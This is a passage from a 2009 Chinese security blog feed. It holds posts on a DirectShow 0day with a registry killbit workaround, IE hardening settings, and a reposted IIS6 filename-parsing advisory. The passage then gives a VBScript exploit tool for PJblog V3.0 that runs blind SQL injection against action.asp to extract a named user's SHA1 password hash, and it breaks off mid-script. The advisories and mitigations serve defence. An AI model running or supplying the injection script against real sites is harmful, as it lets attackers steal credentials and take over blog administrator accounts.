		<category><![CDATA[DirectShow]]></category>
		<category><![CDATA[漏洞]]></category>

		<guid isPermaLink="false">http://www.am82.cn/houzan/?p=2172</guid>
		<description><![CDATA[漏洞攻击形势：
 

DirectShow 0DAY第二波爆发！！该漏洞在国内已经呈大规模爆发形势。至少有几千网站被挂上了该漏洞的网页木马！

漏洞攻击细节：

与第一波的DirectShow 0DAY 不同，这次的漏洞是.......]]></description>
			<content:encoded><![CDATA[<p><strong>漏洞攻击形势：</strong></p>
<p>DirectShow 0DAY第二波爆发！！该漏洞在国内已经呈大规模爆发形势。至少有几千网站被挂上了该漏洞的网页木马！</p>
<p><strong>漏洞攻击细节：</strong></p>
<p>与第一波的DirectShow 0DAY 不同，这次的漏洞是DirectShow相关msvidctl.dll组件解析畸形MPEG2视频格式文件触发溢出，攻击者可以使用普通的javascript堆喷射方式远程执行任意代码。</p>
<p><strong>漏洞来源：</strong><a href="http://news.baike.360.cn/3451604/27274290.html">http://news.baike.360.cn/3451604/27274290.html</a></p>
<p><strong>漏洞临时解决方法：</strong></p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-KillBit相关组件,将下面的内容保存为.reg文件双击即可.&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-</p>
<p>Windows Registry Editor Version 5.00<br />
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]<br />
&#8220;Compatibility Flags&#8221;=dword:00000400</p>
]]></content:encoded>
			<wfw:commentRss>http://www.am82.com/houzan/archives/2172/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>针对最近的那个DirectShow 0day的临时安全设置</title>
		<link>http://www.am82.com/houzan/archives/1877</link>
		<comments>http://www.am82.com/houzan/archives/1877#comments</comments>
		<pubDate>Sat, 06 Jun 2009 16:00:39 +0000</pubDate>
		<dc:creator>假装纯情</dc:creator>
				<category><![CDATA[技术专题]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[DirectShow]]></category>
		<category><![CDATA[设置]]></category>

		<guid isPermaLink="false">http://www.am82.cn/houzan/?p=1877</guid>
		<description><![CDATA[作者：tombkeeper

以下主要是写给订阅这个blog的非信息安全专业人士看的，同行们可以忽略。

关于漏洞的相关信息在这里：
http://www.microsoft.com/china/technet/security/advisory/971778.mspx。

目前微软还没有修复该漏洞。运气好的话，也许微软会在本月就发布补丁，但更大的可能是至少到下个月中旬才会有补丁。

无论你是否........]]></description>
			<content:encoded><![CDATA[<p>作者：<a href="http://hi.baidu.com/tombkeeper/blog/item/587d2a01117f53067bec2cb9.html" target="_blank"><span style="color: #0b59b2;">tombkeeper</span></a></p>
<p>以下主要是写给订阅这个blog的非信息安全专业人士看的，同行们可以忽略。</p>
<p>关于漏洞的相关信息在这里：<br />
<a href="http://www.microsoft.com/china/technet/security/advisory/971778.mspx" target="_blank"><span style="color: #0b59b2;">http://www.microsoft.com/china/technet/security/advisory/971778.mspx</span></a>。</p>
<p>目前微软还没有修复该漏洞。运气好的话，也许微软会在本月就发布补丁，但更大的可能是至少到下个月中旬才会有补丁。</p>
<p>无论你是否使用了微软提供的临时解决方案，我都建议大家在IE中进行以下的额外安全设置：</p>
<p><a href="http://huaidan.org/wp-content/uploads/2009/06/78abab0ebd5f03c237d12209.png"></a></p>
<p> <img class="aligncenter size-full wp-image-1880" title="78abab0ebd5f03c237d12209" src="http://www.am82.cn/houzan/wp-content/uploads/2009/06/78abab0ebd5f03c237d12209.png" alt="78abab0ebd5f03c237d12209" width="417" height="438" /></p>
<p>即在“<span style="text-decoration: underline;">运行未用 Authenticode 签名的组件</span>”和“<span style="text-decoration: underline;">运行已用 Authenticode 签名的组件</span>”下选择“<span style="color: #ff0000;">禁用</span>”。</p>
<p>这个设置并不会修复漏洞，但是可以让目前针对这个漏洞的利用方法失败。我建议大家让自己的IE浏览器一直保持着这样的安全设置，即使在微软提供了该漏洞的补丁之后。</p>
]]></content:encoded>
			<wfw:commentRss>http://www.am82.com/houzan/archives/1877/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Microsoft Internet Infomation Server 6.0 ISAPI Filename Analytic Vulnerability</title>
		<link>http://www.am82.com/houzan/archives/1577</link>
		<comments>http://www.am82.com/houzan/archives/1577#comments</comments>
		<pubDate>Fri, 24 Apr 2009 10:40:37 +0000</pubDate>
		<dc:creator>假装纯情</dc:creator>
				<category><![CDATA[技术专题]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[IIS]]></category>

		<guid isPermaLink="false">http://www.am82.cn/houzan/?p=1577</guid>
		<description><![CDATA[此漏洞，暂无补丁，转载开始……]]></description>
			<content:encoded><![CDATA[<p>此漏洞，暂无补丁，转载开始……</p>
<p> </p>
<p>Microsoft Internet Infomation Server 6.0 ISAPI Filename Analytic Vulnerability</p>
<p>function Copyright()<br />
{</p>
<p>var Author=”80sec”;<br />
var Email=”<strong>kEvin</strong>#80sec.com”.replace(”#”,”@”)<br />
var Site=”http://www.80sec.com”;<br />
var Date=new Date(2009,4,24).toLocaleString();<br />
var Reference=”http://www.80sec.com/Microsoft-Internet-Infomation-Server-6-ISAPI-filename-analytic-Vulnerabilitie.html”;<br />
return Reference;</p>
<p>}</p>
<p>/*</p>
<p>漏洞描述:</p>
<p>IIS6 (Internet Infomation Server 6.0) 是微软出品的一款WEB服务器系统, 广泛用于各种个人/商业信息发布/网站架设领域。80sec在测试中发现, IIS设计上在处理畸形文件名的时候存在一个严重的安全漏洞, 可能绕过web程序的逻辑检查从而能导致服务器以IIS进程权限执行任意恶意用户定义的脚本, 黑客可以通过制造畸形的服务器文件来触发该 漏洞, 并从而控制服务器.</p>
<p>漏洞厂商:</p>
<p>Microsoft [ http:\/\/www.microsoft.com ]</p>
<p>漏洞测试:</p>
<p>Undefined</p>
<p>解决方案:</p>
<p>等待微软更新官方补丁.</p>
<p>*/</p>
<div class="meta">本站内容均为原创，转载请务必保留署名与链接！<br />
<a title="Microsoft Internet Infomation Server 6.0 ISAPI Filename Analytic Vulnerability" href="http://www.80sec.com/microsoft-internet-infomation-server-6-isapi-filename-analytic-vulnerabilitie.html">Microsoft Internet Infomation Server 6.0 ISAPI Filename Analytic Vulnerability</a>:<a title="Microsoft Internet Infomation Server 6.0 ISAPI Filename Analytic Vulnerability" href="http://www.80sec.com/microsoft-internet-infomation-server-6-isapi-filename-analytic-vulnerabilitie.html">http://www.80sec.com/microsoft-internet-infomation-server-6-isapi-filename-analytic-vulnerabilitie.html</a></div>
]]></content:encoded>
			<wfw:commentRss>http://www.am82.com/houzan/archives/1577/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>PJblog V3.0 0day Vbs版漏洞利用工具</title>
		<link>http://www.am82.com/houzan/archives/1568</link>
		<comments>http://www.am82.com/houzan/archives/1568#comments</comments>
		<pubDate>Thu, 23 Apr 2009 12:07:54 +0000</pubDate>
		<dc:creator>假装纯情</dc:creator>
				<category><![CDATA[技术专题]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[Pjblog]]></category>
		<category><![CDATA[工具]]></category>

		<guid isPermaLink="false">http://www.am82.cn/houzan/?p=1568</guid>
		<description><![CDATA[.......]]></description>
			<content:encoded><![CDATA[<p>漏洞具体细节请看<a href="http://0kee.com/read.php?tid-908.html" target="_blank">http://0kee.com/read.php?tid-908.html</a>，我的电脑上没有安装php，就编写了一个Vbs版漏洞利用工具，具体代码如下：<br />
 </p>
<div style="font-size: 10pt; color: #999; font-family: Courier New,Courier,宋体; background-color: #f3f3f3; border: #ccc 1px solid;">
<ol style="padding-left: 42px; list-style-position: outside; margin: 0px; list-style-type: decimal;">
<li style="font-weight: bold; border-left: #abc 1px solid; cursor: pointer; color: #000; font-style: italic; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #00f;">If</span> <span style="color: #000;" onclick="jssc.active(this)">WScript</span>.<span style="color: #000;" onclick="jssc.active(this)">Arguments</span>.<span style="color: #000;" onclick="jssc.active(this)">Count</span> &lt;&gt; <span style="color: #a36;">2</span> <span style="color: #00f;">Then</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">        <span style="color: #000;" onclick="jssc.active(this)">WScript</span>.<span style="color: #000;" onclick="jssc.active(this)">Echo</span> <span style="color: #900;">&#8220;Usage: Cscript.exe Exp.vbs 要检测的论坛网址 要检测的用户名&#8221;</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">        <span style="color: #000;" onclick="jssc.active(this)">WScript</span>.<span style="color: #000;" onclick="jssc.active(this)">Echo</span> <span style="color: #900;">&#8220;Example: Cscript.exe Exp.vbs http://www.pjhome.net puterjam&#8221;</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">        <span style="color: #000;" onclick="jssc.active(this)">WScript</span>.<span style="color: #000;" onclick="jssc.active(this)">Quit</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #00f;">End</span> <span style="color: #00f;">If</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"> </div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #000;" onclick="jssc.active(this)">attackUrl</span> = <span style="color: #000;" onclick="jssc.active(this)">WScript</span>.<span style="color: #000;" onclick="jssc.active(this)">Arguments</span>(<span style="color: #a36;">0</span>)</div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #000;" onclick="jssc.active(this)">attackUser</span> = <span style="color: #000;" onclick="jssc.active(this)">WScript</span>.<span style="color: #000;" onclick="jssc.active(this)">Arguments</span>(<span style="color: #a36;">1</span>)</div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #000;" onclick="jssc.active(this)">attackUrl</span> = <span style="color: #000;" onclick="jssc.active(this)">Replace</span>(<span style="color: #000;" onclick="jssc.active(this)">attackUrl</span>,<span style="color: #900;">&#8220;\&#8221;,&#8221;</span>/<span style="color: #900;">&#8220;)</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #900;">If Right(attackUrl , 1) &lt;&gt; &#8221;</span>/<span style="color: #900;">&#8220; Then</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #900;">        attackUrl = attackUrl &amp; &#8221;</span>/<span style="color: #900;">&#8220;</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #900;">End If</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #900;">SHA1Charset = &#8221;</span><span style="color: #000;" onclick="jssc.active(this)">123456789ABCDEFJ</span><span style="color: #900;">&#8220;</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #900;">strHoleUrl = attackUrl &amp; &#8221;</span><span style="color: #000;" onclick="jssc.active(this)">ction</span>.<span style="color: #000;" onclick="jssc.active(this)">asp</span>?<span style="color: #000;" onclick="jssc.active(this)">action</span>=<span style="color: #000;" onclick="jssc.active(this)">checkAlias</span>&amp;<span style="color: #000;" onclick="jssc.active(this)">cname</span>=<span style="color: #000;" onclick="jssc.active(this)">0kee</span><span style="color: #900;">&#8220;&#8221;</span><span style="color: #900;">&#8220;</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"> </div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #900;">If IsSuccess(strHoleUrl &amp; &#8221;</span><span style="color: #000;" onclick="jssc.active(this)">r</span> <span style="color: #900;">&#8220;&#8221;</span><span style="color: #a36;">1</span><span style="color: #900;">&#8220;&#8221;</span>=<span style="color: #900;">&#8220;&#8221;</span><span style="color: #a36;">1</span><span style="color: #900;">&#8220;) And Not IsSuccess(strHoleUrl &amp; &#8221;</span><span style="color: #000;" onclick="jssc.active(this)">and</span> <span style="color: #900;">&#8220;&#8221;</span><span style="color: #a36;">1</span><span style="color: #900;">&#8220;&#8221;</span>=<span style="color: #900;">&#8220;&#8221;</span><span style="color: #a36;">2</span><span style="color: #900;">&#8220;) Then</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #900;">        WScript.Echo &#8221;</span>恭喜！存在漏洞<span style="color: #900;">&#8220;</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #900;">Else</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #900;">        WScript.Echo &#8221;</span>没有检测到漏洞<span style="color: #900;">&#8220;</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #900;">        WScript.Quit</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #900;">End If</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"> </div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #900;">For n=1 To 40</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #900;">        For i=1 To 17</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #900;">                strInject = strHoleUrl &amp; &#8221;</span> <span style="color: #00f;">Or</span> <span style="color: #a36;">0</span>&lt;(<span style="color: #00f;">Select</span> <span style="color: #000;" onclick="jssc.active(this)">Count</span>(*) <span style="color: #000;" onclick="jssc.active(this)">From</span> <span style="color: #000;" onclick="jssc.active(this)">blog_member</span> <span style="color: #000;" onclick="jssc.active(this)">Where</span> <span style="color: #000;" onclick="jssc.active(this)">mem_name</span>=<span style="color: #090;">&#8216;&#8221; &amp; attackUser &amp; &#8221;&#8216; And mem_password&gt;=&#8217;&#8221; &amp; strResult &amp; Mid(SHA1Charset, i, 1) &amp; &#8221;&#8216;) And &#8221;"1&#8243;&#8221;=&#8221;"1&#8243;</span></div>
</li>
<li style="font-weight: bold; border-left: #abc 1px solid; cursor: pointer; color: #000; font-style: italic; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">                <span style="color: #00f;">If</span> <span style="color: #00f;">Not</span> <span style="color: #000;" onclick="jssc.active(this)">IsSuccess</span>(<span style="color: #000;" onclick="jssc.active(this)">strInject</span>) <span style="color: #00f;">Then</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">                        <span style="color: #000;" onclick="jssc.active(this)">strResult</span> = <span style="color: #000;" onclick="jssc.active(this)">strResult</span> &amp; <span style="color: #000;" onclick="jssc.active(this)">Mid</span>(<span style="color: #000;" onclick="jssc.active(this)">SHA1Charset</span>, <span style="color: #000;" onclick="jssc.active(this)">i</span>-<span style="color: #a36;">1</span>, <span style="color: #a36;">1</span>)</div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">                        <span style="color: #00f;">Exit</span> <span style="color: #00f;">For</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">                <span style="color: #00f;">End</span> <span style="color: #00f;">If</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">                <span style="color: #000;" onclick="jssc.active(this)">strPrint</span> = <span style="color: #000;" onclick="jssc.active(this)">chr</span>(<span style="color: #a36;">13</span>) &amp; <span style="color: #900;">&#8220;Password(SHA1): &#8221;</span> &amp; <span style="color: #000;" onclick="jssc.active(this)">strResult</span> &amp; <span style="color: #000;" onclick="jssc.active(this)">Mid</span>(<span style="color: #000;" onclick="jssc.active(this)">SHA1Charset</span>, <span style="color: #000;" onclick="jssc.active(this)">i</span>, <span style="color: #a36;">1</span>)                </div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">                <span style="color: #000;" onclick="jssc.active(this)">WScript</span>.<span style="color: #000;" onclick="jssc.active(this)">StdOut</span>.<span style="color: #000;" onclick="jssc.active(this)">Write</span> <span style="color: #000;" onclick="jssc.active(this)">strPrint</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">        <span style="color: #00f;">Next</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal; background-color: transparent;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #00f;">Next</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #000;" onclick="jssc.active(this)">WScript</span>.<span style="color: #000;" onclick="jssc.active(this)">Echo</span> <span style="color: #000;" onclick="jssc.active(this)">Chr</span>(<span style="color: #a36;">13</span>) &amp; <span style="color: #000;" onclick="jssc.active(this)">Chr</span> (<span style="color: #a36;">10</span>) &amp; <span style="color: #900;">&#8220;Done!&#8221;</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"> </div>
</li>
<li style="font-weight: bold; border-left: #abc 1px solid; cursor: pointer; color: #000; font-style: italic; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #00f;">Function</span> <span style="color: #000;" onclick="jssc.active(this)">PostData</span>(<span style="color: #000;" onclick="jssc.active(this)">PostUrl</span>)</div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">    <span style="color: #00f;">Dim</span> <span style="color: #000;" onclick="jssc.active(this)">Http</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">    <span style="color: #00f;">Set</span> <span style="color: #000;" onclick="jssc.active(this)">Http</span> = <span style="color: #000;" onclick="jssc.active(this)">CreateObject</span>(<span style="color: #900;">&#8220;msxml2.serverXMLHTTP&#8221;</span>)</div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">    <span style="color: #00f;">With</span> <span style="color: #000;" onclick="jssc.active(this)">Http</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">        .<span style="color: #000;" onclick="jssc.active(this)">Open</span> <span style="color: #900;">&#8220;GET&#8221;</span>,<span style="color: #000;" onclick="jssc.active(this)">PostUrl</span>,<span style="color: #00f;">False</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">        .<span style="color: #000;" onclick="jssc.active(this)">Send</span> ()</div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">        <span style="color: #000;" onclick="jssc.active(this)">PostData</span> = .<span style="color: #000;" onclick="jssc.active(this)">ResponseBody</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">    <span style="color: #00f;">End</span> <span style="color: #00f;">With</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">    <span style="color: #00f;">Set</span> <span style="color: #000;" onclick="jssc.active(this)">Http</span> = <span style="color: #00f;">Nothing</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;">    <span style="color: #000;" onclick="jssc.active(this)">PostData</span> =<span style="color: #000;" onclick="jssc.active(this)">bytes2BSTR</span>(<span style="color: #000;" onclick="jssc.active(this)">PostData</span>)</div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"><span style="color: #00f;">End</span> <span style="color: #00f;">Function</span></div>
</li>
<li style="border-left: #abc 1px solid; background-color: #fff;" onclick="jssc.collapse(this)">
<div style="padding-left: 10px; font-weight: normal; color: #000; font-style: normal;" onmouseover="this.style.backgroundColor=&quot;#ff9&quot;" onmouseout="this.style.backgroundColor=&quot;transparent&quot;"> </div>
</li>
<li style="border-left: #abc 1px solid; background-color: #f9f9f9;" onclick="jssc.collapse(this)">
